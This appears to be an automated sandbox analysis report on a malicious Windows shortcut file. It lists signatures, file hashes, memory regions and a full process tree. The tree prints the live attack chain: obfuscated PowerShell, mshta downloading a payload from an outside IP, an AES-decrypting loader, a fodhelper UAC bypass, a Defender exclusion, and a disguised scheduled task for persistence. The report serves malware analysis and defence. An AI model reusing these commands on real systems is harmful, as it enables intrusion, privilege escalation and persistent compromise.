Overview

overview

10

Static

static

1

043ecf8511...52.lnk

windows7-x64

3

043ecf8511...52.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-02-2024 02:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952.lnk

  • Size

    338KB

  • MD5

    aa17c1186359a1ff75f4c53531de4b40

  • SHA1

    726d59562bf9c5530706337181c995aa7aa7df56

  • SHA256

    043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952

  • SHA512

    27b6b98863ffb086a5712f1f3055373e0107f4062084850563ca3cc1f08df836f1a01f29696a4f1c8a7c38a4118c9c7a99b91afb7fa255bd89e6ec446f062c25

  • SSDEEP

    24:82/ByKnC+/lZnY7t9LQluwN0v+6ezliqYnWcAarab/B4f:8KPnZY78ZemrMqeA4abBC

Score
10/10
evasiontrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.92.248.36/Downloads/config.exe

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 46 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952.lnk
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4300
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -}
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:512
          • C:\Windows\system32\mshta.exe
            "C:\Windows\system32\mshta.exe" http://91.92.248.36/Downloads/config.exe
            5⤵
            • Blocklisted process makes network request
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $wauLzkw = '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';$OgScJgJi = 'SkpHRVl2TnV5dFNtYW5DdHVYbGRPQk5QandWRlpOU0o=';$BwerIjm = New-Object 'System.Security.Cryptography.AesManaged';$BwerIjm.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BwerIjm.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BwerIjm.BlockSize = 128;$BwerIjm.KeySize = 256;$BwerIjm.Key = [System.Convert]::FromBase64String($OgScJgJi);$FfImT = [System.Convert]::FromBase64String($wauLzkw);$dpHrhAbw = $FfImT[0..15];$BwerIjm.IV = $dpHrhAbw;$VveFZCBje = $BwerIjm.CreateDecryptor();$qFKMUzafD = $VveFZCBje.TransformFinalBlock($FfImT, 16, $FfImT.Length - 16);$BwerIjm.Dispose();$FDICvmkx = New-Object System.IO.MemoryStream( , $qFKMUzafD );$hebjfzMz = New-Object System.IO.MemoryStream;$bIJBQdkJw = New-Object System.IO.Compression.GzipStream $FDICvmkx, ([IO.Compression.CompressionMode]::Decompress);$bIJBQdkJw.CopyTo( $hebjfzMz );$bIJBQdkJw.Close();$FDICvmkx.Close();[byte[]] $BDYZJphM = $hebjfzMz.ToArray();$eYTnUe = [System.Text.Encoding]::UTF8.GetString($BDYZJphM);$eYTnUe | powershell -
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1380
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2532
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1092
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:3120
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:3536
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:4104
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4892
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                        11⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4504
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming;
                          12⤵
                          • UAC bypass
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2996
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4376
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                    9⤵
                    • Modifies registry class
                    PID:3564
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                    9⤵
                    • Modifies registry class
                    PID:3340
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2112
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:5076
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:4508
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:4480
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1008
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                        11⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4996
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
                          12⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3140
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
                            13⤵
                            • Creates scheduled task(s)
                            PID:1276
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4072
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1576
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:2760
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:2624
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:3296
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                        PID:4408
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                          11⤵
                            PID:3172
                            • C:\Users\Admin\AppData\Roaming\tiago.exe
                              C:\Users\Admin\AppData\Roaming\tiago.exe
                              12⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1492
                              • C:\Users\Admin\AppData\Roaming\tiago.exe
                                C:\Users\Admin\AppData\Roaming\tiago.exe
                                13⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:816
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                      8⤵
                        PID:4124
                        • C:\Windows\system32\reg.exe
                          REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                          9⤵
                          • Modifies registry class
                          PID:2928
                        • C:\Windows\system32\reg.exe
                          REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                          9⤵
                          • Modifies registry class
                          PID:3484
        • C:\Windows\system32\reg.exe
          REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          1⤵
          • Modifies registry class
          PID:4132
        • C:\Windows\system32\reg.exe
          REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          1⤵
          • Modifies registry class
          PID:1600

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
          Filesize

          64B

          MD5

          446dd1cf97eaba21cf14d03aebc79f27

          SHA1

          36e4cc7367e0c7b40f4a8ace272941ea46373799

          SHA256

          a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

          SHA512

          a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          dea53334d28df2e2e2cf3e9605e6ecf3

          SHA1

          e873615c863c2e478e27e1771cc4e53b700aa2dc

          SHA256

          e89b8fdd07c2078a133b286924ec1095c9692330c5bb6b02154293d162e6a396

          SHA512

          55ef937ff1f1944ad5543596546dfa2905963a7df9913bee8a4c1c64222b806992ef198d17d402ad2aa2f5216c3ede2bf91b032fc5156402c65502beb3e544ac

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          ac6c91d76c702832016dff65476a9d97

          SHA1

          7ddeb70ad5245114daefe157f205b760235f53b3

          SHA256

          2ac5a9033b9157ac95c8229610b25b222b4d3bab56c073d34e7d8c56d040bd6b

          SHA512

          cc2f1601cda348b7e633eb658a2b07dc36e7e2aa9eac8b8bb98d0ee150aafc3ed16573cfa1eefa75f008e37a688c32036803e6da8edff0806ec8c5d6766c8d60

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          fc65dff27dd48fcddf45819a8fe7bddb

          SHA1

          bc0cb86c506548b82ecf2558a08f2a6bdab4dba3

          SHA256

          0eb4be6617ed30cddd5a66d977e4a62a461c8d087cad13d39dd63aa8c0705c0b

          SHA512

          fd43d6392de680a6a65cc86552a63b1b7a6b45a2041bcb683f43274363df55e20fbb0577379b920c7d0177b35398457df499845a311d09aeb24f727686aa9c3d

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppsjrhuj.fyp.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\r.bat
          Filesize

          147B

          MD5

          3f46500c62390375952919974961cde9

          SHA1

          304cffd5642073f6739759e1fb69bd0134ef174e

          SHA256

          36e4e0d31b2919eb834e914f6a20f2b1712fd000ce7b61adc68b4b682a967805

          SHA512

          28918397df5f900214a3bcaddc7e0aa30bbad712bde5edddc89cae0e8e5c8002822791cf73eed837775837bd7b0748292ef5673bc7ce5e9ebdc6b87a6da74247

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\r.bat
          Filesize

          360B

          MD5

          e2b2e599d70d6fc8b5cafc627355d1a0

          SHA1

          cf6e53269301edab9bdb6e1c712804b61d290f77

          SHA256

          3a5120a60bd357c8424d794406d2349969d9382240ddad1b31c9eb7254606c3f

          SHA512

          d68d4a0225bcd08bd58dfce56be5e49929e160314e6155509ce081e9dcae6e155d91d0c7556740787bc0903ee41c0f31baa2a93d2c290aac0edf20909e6691b6

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\r.bat
          Filesize

          264B

          MD5

          676b5f856c87e67d7415b31374d062d7

          SHA1

          76e42d132f4069284f4b98c55c37639c3992f35a

          SHA256

          25be22616ba9c65573a98415aa36feb8b1e45df39d11cd22c602c55f1a172e4b

          SHA512

          8056e016226d3b4c05315454c96a1c79730d03a8a2255579bc8a791b40913c7d309b22a6db56dced6ead1539fd9968ba0de41d382ab778d4d8ec37511f774255

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          6KB

          MD5

          ed8b726bc817f7ec807a8bb35f5b9b96

          SHA1

          cf902d03bb68847c23597d994436961ff6a80f24

          SHA256

          1e7d973b585787215f06043c9c5d977b1a9abbbc20e4ba3a7dd0abadbbba0cf8

          SHA512

          42e1e8111b370283c34f3dba762a1cd701987ae99ef4464ffdc4744e603e34aa35d12a85e475f7bdd85f9267615a09ea04e395cd27d7813b8fdce8a88049891f

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          6KB

          MD5

          46029634d8520e2e56ea269131f53369

          SHA1

          9356420390872851834148e63864ee5270d9578e

          SHA256

          90a347cef913b4ac2865388d4f54b6b436a731b0d8bb565f503de199ff82db15

          SHA512

          c0f1ba9b18c5b789507817d0e21e2da90de3834eed30ef9d8240167c972fcd9268ef3d48939018fd17287c3338aa487d6ec7b590a3d210152d67f2920ca14135

          Download Submit

        • C:\Users\Admin\AppData\Roaming\tiago.exe
          Filesize

          10.9MB

          MD5

          41b99b0770f01afbd80481fb6f811bcc

          SHA1

          58ee2fb1672b3af2db7997bb91cf3ab138d801e1

          SHA256

          d457b15dfcdd6669d60af6d96f56757674b6f0fbba11999f76f47e03bd635d09

          SHA512

          f9642a06e797992423b3d93785d175b081637b691c41d3f4a35dfd2860aa83cb967c4ceeace86a61e524f1ef674d1af1fab1de8e82ca45b11254cb666b78b08e

          Download Submit

        • memory/512-31-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/512-17-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/512-19-0x0000028770EF0000-0x0000028770F00000-memory.dmp

          Filesize

          64KB

          Download

        • memory/512-18-0x0000028770EF0000-0x0000028770F00000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1380-37-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1380-38-0x0000022D76380000-0x0000022D76390000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1380-121-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1380-107-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1380-108-0x0000022D76380000-0x0000022D76390000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1520-10-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1520-15-0x00000204CF000000-0x00000204CF01C000-memory.dmp

          Filesize

          112KB

          Download

        • memory/1520-11-0x00000204B4680000-0x00000204B4690000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1520-16-0x00000204B4680000-0x00000204B4690000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1520-0-0x00000204CEA50000-0x00000204CEA72000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1520-12-0x00000204B4680000-0x00000204B4690000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1520-35-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1520-14-0x00007FFF94BF0000-0x00007FFF94CA5000-memory.dmp

          Filesize

          724KB

          Download

        • memory/1520-13-0x00000204CEF20000-0x00000204CEFD5000-memory.dmp

          Filesize

          724KB

          Download

        • memory/2532-82-0x000002073BFA0000-0x000002073BFB0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2532-81-0x000002073BFA0000-0x000002073BFB0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2532-118-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2532-50-0x000002073BFA0000-0x000002073BFB0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2532-49-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2996-79-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2996-77-0x0000023AAFF60000-0x0000023AAFF70000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2996-76-0x0000023AAFF60000-0x0000023AAFF70000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2996-75-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3140-101-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3140-102-0x0000028FD2460000-0x0000028FD2470000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3140-104-0x0000028FD2460000-0x0000028FD2470000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3140-106-0x00007FFF932B0000-0x00007FFF93D71000-memory.dmp

          Filesize

          10.8MB

          Download